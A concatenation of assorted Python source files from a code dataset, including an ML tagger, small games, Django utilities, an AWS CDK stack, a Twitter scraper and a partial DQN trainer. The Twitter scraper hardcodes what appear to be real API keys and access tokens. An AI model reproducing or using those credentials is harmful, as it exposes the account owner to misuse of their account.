test_dataloader:\n batch_data_list, batch_label_list, batch_len_list, padded_sublens = sample\n batch_tag_score = tagger.forward(batch_data_list,\n batch_len_list, padded_sublens)\n for i, sample_tag_list in enumerate(batch_tag_score):\n predicted_tags = tagger.getLabel(sample_tag_list)\n for j in range(batch_len_list[i]):\n t = predicted_tags[j]\n w = reversed_dict[t]\n wf.write(str(w) + \"\\n\")\n wf.write(\"\\n\")\n\n def train(self):\n print(\"Loading data\")\n train_dataset = As3Dataset(self.train_file, is_test_data=False, is_train_data=True)\n print(\"Done loading data\")\n\n self.wTran = WTranslator()\n self.lTran = TagTranslator()\n\n print(\"translate to indexes\")\n #train_dataset.toIndexes(wT = self.wTran, lT = self.lTran)\n train_dataset.setTranslators(wT = self.wTran, lT = self.lTran)\n print(\"done\")\n\n print(\"init tagger\")\n tagger = BiLSTM(embedding_dim = self.edim, hidden_rnn_dim = self.rnn_h_dim,\n translator=self.wTran, 
tagset_size = self.lTran.getLengths()['tag'] + 1,\n c_embedding_dim = self.c_embedding_dim, dropout = self.dropout)\n print(\"done\")\n\n print(\"define loss and optimizer\")\n loss_function = nn.CrossEntropyLoss() #ignore_index=len(lTran.tag_dict))\n optimizer = torch.optim.Adam(tagger.parameters(), lr=self.learning_rate) #0.01)\n print(\"done\")\n\n print(\"init padder\")\n padder = Padding(self.wTran, self.lTran)\n print(\"done\")\n\n train_dataloader = DataLoader(dataset=train_dataset,\n batch_size=self.batch_size, shuffle=True,\n collate_fn = padder.collate_fn)\n \n print(\"Starting training\")\n print(\"data length = \" + str(len(train_dataset)))\n \n if self.run_dev:\n self.runOnDev(tagger, padder) \n for epoch in range(self.num_epochs):\n loss_acc = 0\n progress1 = 0\n progress2 = 0\n correct_cntr = 0\n total_cntr = 0\n sentences_seen = 0\n for sample in train_dataloader:\n if progress1/1000 == progress2:\n print(\"reached \" + str(progress2*1000))\n progress2+=1\n progress1 += self.batch_size\n sentences_seen += self.batch_size\n\n tagger.zero_grad()\n #batch_data_list, batch_label_list, batch_len_list, padded_sublens = sample\n \n batch_tag_score = tagger.forward(sample)\n \n flatten_tag, flatten_label = self._flat_vecs(batch_tag_score, batch_label_list)\n\n #calc accuracy\n c, t = self._calc_batch_acc(tagger, flatten_tag, flatten_label)\n correct_cntr += c \n total_cntr += t\n\n loss = loss_function(flatten_tag, flatten_label)\n loss_acc += loss.item()\n loss.backward()\n optimizer.step()\n\n if sentences_seen >= 500:\n sentences_seen = 0\n if self.run_dev:\n self.runOnDev(tagger, padder) \n \n print(\"epoch: \" + str(epoch) + \" \" + str(loss_acc))\n print(\"Train accuracy \" + str(correct_cntr/total_cntr))\n \n if self.save_to_file:\n self._save_model_params(tagger, self.wTran, self.lTran)\n\n if self.run_dev:\n self._saveAccData()\n #if (sys.argv[1] == 'save') or (sys.argv[1] == 'loadsave'):\n #self._save_model_params(tagger, self.wTran, self.lTran)\n #torch.save(tagger.state_dict(), 'bilstm_params.pt')\n\n\nFAVORITE_RUN_PARAMS = { \n 'EMBEDDING_DIM' : 50, \n 'RNN_H_DIM' : 50, \n 'EPOCHS' : 20, \n 'BATCH_SIZE' : 2,\n 'CHAR_EMBEDDING_DIM': 15,\n 'LEARNING_RATE' : 0.01\n }\n\nif __name__ == \"__main__\": \n train_file = \"./data/snli_1.0/small_dataset.jsonl\"\n #\"sys.argv[1]\n model_file = 'SOMEMODEL' #sys.argv[2]\n epochs = 1 #int(sys.argv[3])\n run_dev = 'n' #sys.argv[4]\n if run_dev == 'y':\n run_dev = True\n dev_file = sys.argv[5]\n else:\n run_dev = False\n dev_file = None\n \n RUN_PARAMS = FAVORITE_RUN_PARAMS\n RUN_PARAMS.update({ \n 'TRAIN_FILE': train_file,\n 'DEV_FILE' : dev_file,\n 'TEST_FILE': None, #test_file,\n 'TEST_O_FILE': None, #test_o_file,\n 'MODEL_FILE': model_file,\n 'SAVE_TO_FILE': False, \n 'RUN_DEV' : run_dev,\n 'EPOCHS' : epochs, \n 'DROPOUT' : True})\n \n run = Run(RUN_PARAMS)\n\n run.train()\n","sub_path":"tagger.py","file_name":"tagger.py","file_ext":"py","file_size_in_byte":23996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"102897622","text":"from pico2d import *\n\ndef handle_events():\n global running,x,y,dx\n evts=get_events()\n for e in evts:\n if e.type==SDL_QUIT:\n running=False\n elif e.type==SDL_KEYDOWN:\n if e.key==SDLK_ESCAPE:\n running=False\n elif e.key==SDLK_LEFT:\n dx-=1\n elif e.key==SDLK_RIGHT:\n dx+=1\n print('keydown',dx)\n elif e.type==SDL_KEYUP:\n if e.key==SDLK_LEFT:\n dx+=1\n elif e.key==SDLK_RIGHT:\n dx-=1\n elif e.type==SDL_MOUSEMOTION:\n 
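# SDL reports the mouse y from the top-left corner, but pico2d's canvas\n            # origin is bottom-left, so flip y against the canvas height.\n            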
x,y=e.x,get_canvas_height()-e.y-1\n\nopen_canvas()\n\ngra=load_image('grass.png')\nch=load_image('run_animation.png')\n\nrunning=True\nx,y=400,85\ndx=0\nfidx=0\nwhile running:\n clear_canvas()\n gra.draw(400,30)\n ch.clip_draw(fidx*100,0,100,100,x,85)\n update_canvas()\n x+=dx\n\n handle_events()\n\n fidx=(fidx+1)%8\n \n delay(0.01)\n\nclose_canvas()\n","sub_path":"3주차 애니메이션/move_character_with_mouse.py","file_name":"move_character_with_mouse.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"234512452","text":"# On CodeEval, test cases are read in from a file which is the first argument to your program\n# Open the file and read in line by line. Each line represents a different test case\n# (unless given different instructions in the challenge description)\n\nimport sys\n\n#sys.argv[1]\ntest_cases = open(sys.argv[1], 'r')\n\nfor test in test_cases:\n # ignore test if it is an empty line\n # 'test' represents the test case, do something with it\n # ...\n # ...\n\n #need the characters\n numlist = test.split()\n if not numlist:\n continue\n x, y, n = numlist\n\n x = int(x)\n y = int(y)\n\n if ( x > 20 or x < 1 ):\n exit()\n if ( y > 20 or y < 1 ):\n exit()\n\n #restring\n string =\"\"\n\n #test nums 1 - n\n for i in range(1, int(n)+1):\n #fizz\n if (i%x == 0):\n if (i%y == 0):\n string = string + \" FB\"\n continue\n string = string + \" F\"\n continue\n \n elif (i%y == 0):\n if (i%x == 0):\n string = string + \" FB\"\n continue\n string = string + \" B\"\n continue\n\n \n else: string = string + \" \" + str(i)\n\n print (string[1:])\n\ntest_cases.close()\n","sub_path":"fizzbuzz/fizzbuzz.py","file_name":"fizzbuzz.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"643008296","text":"'''\nCreated on 15 Jul 2015\n\n@author: rstones\n'''\nimport numpy as np\nimport counting_statistics.counting_statistics as cs\nimport quant_mech.utils as utils\nimport matplotlib.pyplot as plt\nfrom vibration_counting_statistics.dimer_vib_model import DimerVibModel\n\nfreq_range = np.linspace(0, 2.5, 100)\n\nmodel = DimerVibModel()\nmodel.J = 0.2\n\nF2 = np.zeros((3, freq_range.size))\n\nmodel.mode_coupling = 0\nL = model.liouvillian\nL_dim = L().shape[0]\nL_jump = model.jump_liouvillian\ndm_pops = np.eye(np.sqrt(L_dim)).flatten()\nss = utils.stationary_state(L(), populations=dm_pops)\nF2[0] = cs.second_order_fano_factor(L, L_jump, ss, freq_range, dm_pops)\n\nmodel.mode_coupling = 0.3\nmode_freq_vals = np.array([1., 2.])\nfor i,freq in enumerate(mode_freq_vals):\n model.omega = freq\n L = model.liouvillian\n L_dim = L().shape[0]\n L_jump = model.jump_liouvillian\n dm_pops = np.eye(np.sqrt(L_dim)).flatten()\n ss = utils.stationary_state(L(), populations=dm_pops)\n F2[i+1] = cs.second_order_fano_factor(L, L_jump, ss, freq_range, dm_pops)\n \nnp.savez('../../data/dimer_vib_finite_freq_F2_data.npz', freq_range=freq_range, F2=F2, mode_freq_vals=mode_freq_vals)\n\nfor row in F2:\n plt.plot(freq_range, row)\nplt.show()","sub_path":"vibration_counting_statistics/src/vibration_counting_statistics/dimer_vib_noise.py","file_name":"dimer_vib_noise.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"516658633","text":"#!/usr/bin/env python3\n\"\"\"manage.py for django admin 
functions.\n\nhttps://docs.djangoproject.com/en/2.0/ref/django-admin/\n\"\"\"\n\nimport os\nfrom pathlib import Path\nimport site\nimport sys\n\nfrom colorama import init as color_init\nfrom termcolor import colored\nfrom dotenv import find_dotenv, load_dotenv\n\n\ndef get_env_variable(name, console=False):\n \"\"\"Get the specified environment variable.\n\n :param name: The name of the variable.\n :type name: str\n :param console: Whether or not this is run via the console or from within django.\n :type console: bool\n :returns: The value of the specified variable.\n :raises: **ImproperlyConfigured** when the specified variable does not exist.\n\n \"\"\"\n try:\n return os.environ[name]\n except KeyError:\n error_msg = \"The {variable_name} environment variable is not set!\\n\".format(\n variable_name=name)\n\n if console:\n color_init()\n sys.stderr.write(\n colored(text=\"ImproperlyConfigured: \" + error_msg, color='red', attrs=['bold']))\n sys.exit(1)\n else:\n from django.core.exceptions import ImproperlyConfigured\n raise ImproperlyConfigured(error_msg)\n\n\ndef activate_env():\n \"\"\"Activates the virtual environment for this project.\"\"\"\n virtualenv_home = Path(get_env_variable(\"WORKON_HOME\", console=True))\n\n filepath = Path(__file__).resolve()\n repo_name = filepath.parents[1].name\n project_name = filepath.parents[0].name\n\n # Add the site-packages of the chosen virtualenv to work with\n site.addsitedir(str(virtualenv_home.joinpath(\n repo_name, \"Lib\", \"site-packages\")))\n\n # Add the app's directory to the PYTHONPATH\n sys.path.append(str(filepath.parents[1]))\n sys.path.append(str(filepath.parents[1].joinpath(project_name)))\n\n # Load .env file\n load_dotenv(find_dotenv())\n\n # Activate the virtual env\n # activate_env = virtualenv_home.joinpath(repo_name, \"bin\", \"activate_this.py\")\n\n #exec(compile(open(str(activate_env)).read(), str(activate_env), 'exec'), dict(__file__=str(activate_env)))\n\n\nif __name__ == \"__main__\":\n if \"test\" in sys.argv:\n os.environ['DJANGO_SETTINGS_MODULE'] = \"uh_internal.settings.test\"\n\n color_init()\n activate_env()\n\n import django\n django.setup()\n\n from django.core.management import execute_from_command_line\n execute_from_command_line(sys.argv)\n","sub_path":"uh_internal/manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"612628926","text":"# encoding: utf-8\n\"\"\"\nFunção:\n Conjugador de verbos regulares\nAutor:\n Edkallenn\nDescrição:\n Esse programa serve para conjugar verbos regulares e demonstra o poder das\n listas na linguagem Python. 
Listas são mutáveis e são objetos facilmente\n manipuláveis através de seus métodos\nComplexidade:\n n\nReferências:\n https://pt.wikipedia.org/wiki/Verbo\n\"\"\"\n#verbo = 'programar'\nverbo = str(raw_input(\"Digite um verbo da regular: \"))\nterminacao = verbo[-2:]\nradical = verbo[:-2]\nconjuga_ar_presente = ['o','as','a','amos','ais','am']\nconjuga_ar_preteritop = ['ei','aste','ou','amos','astes','aram']\nconjuga_ar_preteritoi = ['ava','avas','ava','ávamos','áveis','avam']\nconjuga_ar_preteritomqp = ['ara','aras','ara','áramos','áreis','aram']\nconjuga_ar_futurop = ['arei','arás','ará','aremos','areis','arão']\nconjuga_ar_futuropret = ['aria','arias','aria','aríamos','aríeis','ariam']\nconjuga_gerundio_ar='ando'\nconjuga_participio_ar='ado'\nconjuga_er_presente = ['o','es','e','emos','eis','em']\nconjuga_er_preteritop = ['i','este','eu','emos','estes','eram']\nconjuga_er_preteritoi = ['ia','ias','ia','íamos','íeis','iam']\nconjuga_er_preteritomqp = ['era','eras','era','êramos','êreis','eram']\nconjuga_er_futurop = ['erei','erás','erá','eremos','ereis','erão']\nconjuga_er_futuropret = ['eria','erias','eria','eríamos','eríeis','eriam']\nconjuga_gerundio_er='endo'\nconjuga_participio_er='ido'\nconjuga_ir_presente = ['o','es','e','imos','is','em']\nconjuga_ir_preteritop = ['i','iste','iu','imos','istes','iram']\nconjuga_ir_preteritoi = ['ia','ias','ia','íamos','íeis','iam']\nconjuga_ir_preteritomqp = ['ira','iras','ira','íramos','íreis','iram']\nconjuga_ir_futurop = ['irei','irás','irá','iremos','ireis','irão']\nconjuga_ir_futuropret = ['iria','irias','iria','iríamos','iríeis','iriam']\nconjuga_gerundio_ir='indo'\nconjuga_participio_ir='ido'\npronomes=['eu','tu','ele','nós','vós','eles']\ntempos_indicativo = ['Presente', 'Pretérito Perfeito', 'Pretérito Imperfeito', 'Pretérito Mais-que-perfeito', 'Futuro do Presente', 'Futuro do Pretérito']\n\nprint(\"Verbo: \" + verbo + '\\n' + '================')\nif terminacao=='ar':\n print('Gerúndio: ' + radical + conjuga_gerundio_ar)\n print('Particípio: ' + radical + conjuga_participio_ar + '\\n')\n j = 0\n print(tempos_indicativo[j] + '\\n' + '==============')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_presente[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_preteritop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '====================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_preteritoi[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==========================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_preteritomqp[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_futurop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '===================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ar_futuropret[i])\n print('\\n')\nif terminacao=='er':\n print('Gerúndio: ' + radical + conjuga_gerundio_er)\n print('Particípio: ' + radical + conjuga_participio_er + '\\n')\n j = 0\n print(tempos_indicativo[j] + '\\n' + '==============')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_presente[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_preteritop[i])\n print('\\n' + 
tempos_indicativo[j] + '\\n' + '====================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_preteritoi[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==========================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_preteritomqp[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_futurop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '===================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_er_futuropret[i])\n print('\\n')\nif terminacao=='ir':\n print('Gerúndio: ' + radical + conjuga_gerundio_ir)\n print('Particípio: ' + radical + conjuga_participio_ir + '\\n')\n j = 0\n print(tempos_indicativo[j] + '\\n' + '==============')\n j+=1\n radical_ir=radical.replace ('e','i')\n for i in range(6):\n if i==0:\n print(pronomes[i] + ' ' + radical_ir + conjuga_ir_presente[i])\n else:\n print(pronomes[i] + ' ' + radical + conjuga_ir_presente[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_preteritop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '====================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_preteritoi[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==========================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_preteritomqp[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '==================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_futurop[i])\n print('\\n' + tempos_indicativo[j] + '\\n' + '===================')\n j+=1\n for i in range(6): \n print(pronomes[i] + ' ' + radical + conjuga_ir_futuropret[i])\n print('\\n')\n\n \n","sub_path":"Fontes/Python2/ConjugaVerbos.py","file_name":"ConjugaVerbos.py","file_ext":"py","file_size_in_byte":5928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287636974","text":"from aws_cdk import (\n aws_iam as iam,\n aws_lambda as l,\n core\n)\n\n\nclass InsiderStack(core.Stack):\n\n def __init__(self, scope: core.Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n resource_layer = l.LayerVersion(\n self, 'ResourceLayer',\n code=l.Code.asset('./repos/resources'),\n compatible_runtimes=[l.Runtime.PYTHON_3_8],\n layer_version_name=\"resource_layer\",\n license=\"MIT\"\n )\n\n request_movers = l.Function(\n self, \"RetrieveMovers\",\n runtime=l.Runtime.PYTHON_3_8,\n code=l.Code.asset(\"./repos/python\"),\n handler=\"retrieve_movers.handler\",\n layers=[resource_layer],\n )\n\n request_movers.role.add_managed_policy(\n iam.ManagedPolicy.from_managed_policy_arn(self,\n id=\"AWSLambda_FullAccess\",\n managed_policy_arn=\"arn:aws:iam::aws:policy/AWSLambda_FullAccess\")\n )\n","sub_path":"insider_stack.py","file_name":"insider_stack.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"40335909","text":"from sklearn.svm import LinearSVC\nfrom sklearn.datasets import make_classification\nimport numpy as np\ndef logreg_model(train,seen_classes,classes):\n\tmodels = {}\n\tfor x in seen_classes:\n\t\tclf = LinearSVC(random_state=0, tol=1e-5)\n\t\tY = classes[:,x]\n\t\tY.shape = (train.shape[0],1)\n\t\tmodel = 
clf.fit(train, Y)\n\t\tmodels[x]=model\n\treturn models","sub_path":"Logreg.py","file_name":"Logreg.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"380146850","text":"import time\nimport tweepy\nimport csv\n\nconsumer_key = 'eeSnutOqqknGGGqiso8DPEfdn'\nconsumer_secret = 'uqKKBzpp96NJTBwEBge9wmsVKEJBdoSuMOmsaQiUphikReuJaH'\naccess_token = \"1276097905363828736-RQfCc3FuSvhdwyYhjpoDfO7QH6Q4gB\"\naccess_token_secret = \"nL8jdSU1j0cuRNiGGum8uTaLrq0blGEwqI8kmfwzAMSsJ\"\n\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\n#results = api.search('#covid', count=100, lang=\"en\", since=\"2020-01-01\")\n\ncsvFile = open('hackathon.csv','w')\ncsvwriter = csv.writer(csvFile)\n\nfor item in tweepy.Cursor(api.search,q=\"#covid\",count=100,\n lang=\"en\",\n since=\"2020-01-01\").items():\n\tcsvwriter.writerow([item.user.screen_name.encode(\"utf-8\"),item.text.encode(\"utf-8\"),item.user.followers_count])\n","sub_path":"Desktop/Santushti/ibm/test_again.py","file_name":"test_again.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"331842556","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n# Create your views here.\nimport requests\nfrom datetime import datetime\n\n@api_view(['GET',])\ndef date_check(request,format= None):\n \"\"\"\n pass the params as key value pairs for eg:-\n url = https://httpbin.org\n datetime = yy-mm-dd HH-MM\n sample url\n 'http://127.0.0.1:8000/?url=https://httpbin.org&datetime=2020-05-24 11:25'\n if success returns\n 'status':200\n \"\"\"\n #get the params\n query_date = request.query_params.get('datetime')\n query_url = request.query_params.get('url')\n #get the current time\n now = datetime.now().strftime('%Y-%m-%d %H:%M')\n #print the time for reference\n print(now)\n #if the requested date is same as 'now'\n if query_date == now:\n #send a get request to the param URL\n response = requests.get(query_url)\n \n if response.status_code == 200:#returns the status code \n return Response(data={'status':200})\n\n else:#if the website did not get the request return error\n return Response(data={'status':'error'})\n\n else: #if the time did not match\n return Response(data={'error':'date-time does not match'})\n\n@api_view(['GET',])\ndef ping(request,format= None):\n \"\"\"\n /ping/ to check status of the server\n returns a 'status:OK' object\n \"\"\"\n return Response(data={'status':'OK'})","sub_path":"dateverification/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"646355577","text":"#!/usr/bin/env python\n#combine and tile multi image for one\n\nimport os\nimport re\nfrom PIL import Image\nimport pygame\n\n#image file name must be combined for 'XXX00,XXX01...',giving XXX to this function and it will combined them to one tile image object\ndef imcombine(fheadname,path):\n\t#count is used to looking for how many file\n\tcount=0\n\tfilelist=[]\n\tfor dirpath,dirnames,filenames in os.walk(path):\n\t\tfor ifile in filenames:\n\t\t\tpattern=fheadname+'[0-9]*'\n\t\t\tmatch=re.match(pattern,ifile)\n\t\t\tif 
match!=None:\n\t\t\t\tprint(ifile,':match')\n\t\t\t\tcount+=1\n\t\t\t\tfilelist.append(ifile)\n\t\t\telse:\n\t\t\t\tprint(ifile,':nomatch')\n\tfilelist.sort()\n\tprint(filelist)\n\tim=Image.open(path+'/'+filelist[0])\n\tw=im.size[0]\n\th=im.size[1]\n\tbackground=Image.new('RGBA',(w*count,h))\n\ti=0\n\tfor f in filelist:\n\t\timage=Image.open(path+'/'+f)\n\t\tbackground.paste(image,(w*i,0))\n\t\ti+=1\n\tbgw,bgh=background.size\n\tbgstring=background.tostring()\n\tbg=pygame.image.fromstring(bgstring,(bgw,bgh),'RGBA')\n\tanim=[]\n\tbgw,bgh=bg.get_size()\n\tfor i in xrange(int(bgw/w)):\n\t\tanim.append(bg.subsurface((i*w,0,w,h)))\n\treturn anim\n\t\t\t\n\t\n\t\n\t\nif __name__=='__main__':\n\tpath=os.getcwd()+'/data'\n\tprint(path)\n\timcombine('chief-',path)\n\n","sub_path":"imcombine.py","file_name":"imcombine.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"348390511","text":"# %%writefile dqn-train.py\n# To run this file, use normal command in the cell below like \n# python3 dqn-train.py --game PongDeterminstic --frameskip 1 --train\n#Train a DQN Agent to play a specific game\n\n#CONSTANTS\nTRAIN = None # Boolean value indicating whether the model is to be trained or evaluated\nSAVE = None # Boolean value indicating whether model needs to be saved \nLOAD = None # Boolean value indicating whether model needs to be saved for further training\n\nGAME = None # Name of game\nENV_NAME = None # Name of the environment in ALE\nENV_FRAME_SHAPE = [210, 160, 3] # Shape of frames in the environment\nFRAME_SKIP = None # Count of frame-skip value; FRAME_SKIP = 1 means no frame skipping \n\n#CONTROL PARAMETERS\nMAX_EPISODE_LENGTH = 72000 # Equivalent of 20 minutes of gameplay at 60 frames per second\nSAVE_FREQUENCY = None # Model saved after every SAVE_FREQUENCY timesteps\nEVAL_FREQUENCY = 1000000 # Number of time_steps between evaluations\nEVAL_STEPS = None # Number of frames for one evaluation\nNETW_UPDATE_FREQ = None # Number of time_steps between updating the target network. \n # set to min(10000*FRAME_SKIP, 160000)\nDISCOUNT_FACTOR = None # gamma in the Bellman equation\nREPLAY_MEMORY_START_SIZE = 200000# Number of completely random timesteps, \n # before the agent starts learning\nMAX_STEPS = None # Total number of frames the agent sees\nTRAIN_STEPS = None # Total number of frames that the agent sees in current iterations\nMEMORY_SIZE = None # Number of transitions stored in the replay memory\nNO_OP_STEPS = 10 # Number of 'NOOP' or 'FIRE' actions at the beginning of an \n # evaluation episode\nUPDATE_FREQ = None # Every four actions a gradient descend step is performed: set to max(FRAME_SKIP, 16)\nHIDDEN = 1024 # Number of filters in the final convolutional layer. The output \n # has the shape (1,1,1024) which is split into two streams. Both \n # the advantage stream and value stream have the shape \n # (1,1,512).\nTARGET_LEARNING_RATE = 0.00001 # Learning rate of target network\nLEARNING_RATE = 0.00025 # Set to 0.00025 for quicker results. 
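\n# A hedged sanity check of the epsilon schedule (mirrors the slope/intercept\n# formulas in ExplorationExploitationScheduler below; these values are derived,\n# not part of the original config):\n#   slope = -(1.0 - 0.1) / 4_000_000\n#   intercept = 1.0 - slope * REPLAY_MEMORY_START_SIZE\n#   slope * (REPLAY_MEMORY_START_SIZE + 2_000_000) + intercept  # ~0.55 mid-anneal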
\nBS = 32 # Batch size\nAGENT_HISTORY_LENGTH = 4 # Number of frames stacked together to create a state\nSEED_OFFSET = None # Offset of seed to get a few random runs\n# FRACTION_GPU = 0.95 # If running multiple instances on same GPU, reduce it to 0.45 (for 2) else 1\n\n# OBJECT VARIABLES\nMAIN_DQN = None\nTARGET_DQN = None\ninit = None\nsaver = None\nMAIN_DQN_VARS = None\natari = None\nTARGET_DQN_VARS = None\n\n# PATH VARIABLES\nPATH = None\nSUMMARIES = None\nRUNID = None\n\n### Suppress warnings and tensorflow debug info\nimport os\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport argparse\nimport random\nimport gym\nimport tensorflow.compat.v1 as tf\ntf.disable_v2_behavior()\nimport numpy as np\nimport imageio\nfrom skimage.transform import resize\nimport pickle\nos.environ['TF_CUDNN_DETERMINISTIC']='1'\nos.environ['TF_DETERMINISTIC_OPS'] = '1'\n\n# config = tf.ConfigProto()\n# config.gpu_options.per_process_gpu_memory_fraction = FRACTION_GPU\n\nclass FrameProcessor:\n \"\"\"Resizes and converts RGB Atari frames to grayscale\"\"\"\n def __init__(self, frame_height=84, frame_width=84):\n \"\"\"\n Args:\n frame_height: Integer, Height of a frame of an Atari game\n frame_width: Integer, Width of a frame of an Atari game\n \"\"\"\n self.frame_height = frame_height\n self.frame_width = frame_width\n self.frame = tf.placeholder(shape=ENV_FRAME_SHAPE, dtype=tf.uint8)\n self.processed = tf.image.rgb_to_grayscale(self.frame)\n self.processed = tf.image.crop_to_bounding_box(self.processed, 34, 0, 160, 160)\n self.processed = tf.image.resize_images(self.processed, [self.frame_height, self.frame_width], \n method=tf.image.ResizeMethod.NEAREST_NEIGHBOR)\n \n def __call__(self, session, frame):\n \"\"\"\n Args:\n session: A Tensorflow session object\n frame: A ENV_FRAME_SHAPE frame of an Atari game in RGB\n Returns:\n A processed (frame_height, frame_width, 1) frame in grayscale\n \"\"\"\n return session.run(self.processed, feed_dict={self.frame:frame})\n\nclass DQN:\n \"\"\"Implements a Deep Q Network\"\"\"\n \n # pylint: disable=too-many-instance-attributes\n \n def __init__(self, n_actions, hidden, learning_rate,\n agent_history_length, frame_height=84, frame_width=84):\n \"\"\"\n Args:\n n_actions: Integer, number of possible actions\n hidden: Integer, Number of filters in the final convolutional layer. 
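Its (1, 1, hidden) output is split into the value and advantage streams.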
\n This is different from the DeepMind implementation\n learning_rate: Float, Learning rate for the Adam optimizer\n frame_height: Integer, Height of a frame of an Atari game\n frame_width: Integer, Width of a frame of an Atari game\n agent_history_length: Integer, Number of frames stacked together to create a state\n \"\"\"\n self.n_actions = n_actions\n self.hidden = hidden\n self.learning_rate = learning_rate\n self.frame_height = frame_height\n self.frame_width = frame_width\n self.agent_history_length = agent_history_length\n \n self.input = tf.placeholder(shape=[None, self.frame_height, \n self.frame_width, self.agent_history_length], \n dtype=tf.float32)\n # Normalizing the input\n self.inputscaled = self.input/255\n \n # Convolutional layers\n self.conv1 = tf.layers.conv2d(\n inputs=self.inputscaled, filters=32, kernel_size=[8, 8], strides=4,\n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv1')\n self.conv2 = tf.layers.conv2d(\n inputs=self.conv1, filters=64, kernel_size=[4, 4], strides=2, \n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv2')\n self.conv3 = tf.layers.conv2d(\n inputs=self.conv2, filters=64, kernel_size=[3, 3], strides=1, \n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv3')\n self.conv4 = tf.layers.conv2d(\n inputs=self.conv3, filters=self.hidden, kernel_size=[7, 7], strides=1,\n kernel_initializer=tf.variance_scaling_initializer(scale=2),\n padding=\"valid\", activation=tf.nn.relu, use_bias=False, name='conv4')\n \n # Splitting into value and advantage stream\n self.valuestream, self.advantagestream = tf.split(self.conv4, 2, 3)\n self.valuestream = tf.layers.flatten(self.valuestream)\n self.advantagestream = tf.layers.flatten(self.advantagestream)\n self.advantage = tf.layers.dense(\n inputs=self.advantagestream, units=self.n_actions,\n kernel_initializer=tf.variance_scaling_initializer(scale=2), name=\"advantage\")\n self.value = tf.layers.dense(\n inputs=self.valuestream, units=1, \n kernel_initializer=tf.variance_scaling_initializer(scale=2), name='value')\n \n # Combining value and advantage into Q-values as described above\n self.q_values = self.value + tf.subtract(self.advantage, tf.reduce_mean(self.advantage, axis=1, keepdims=True))\n self.best_action = tf.argmax(self.q_values, 1)\n \n # The next lines perform the parameter update. 
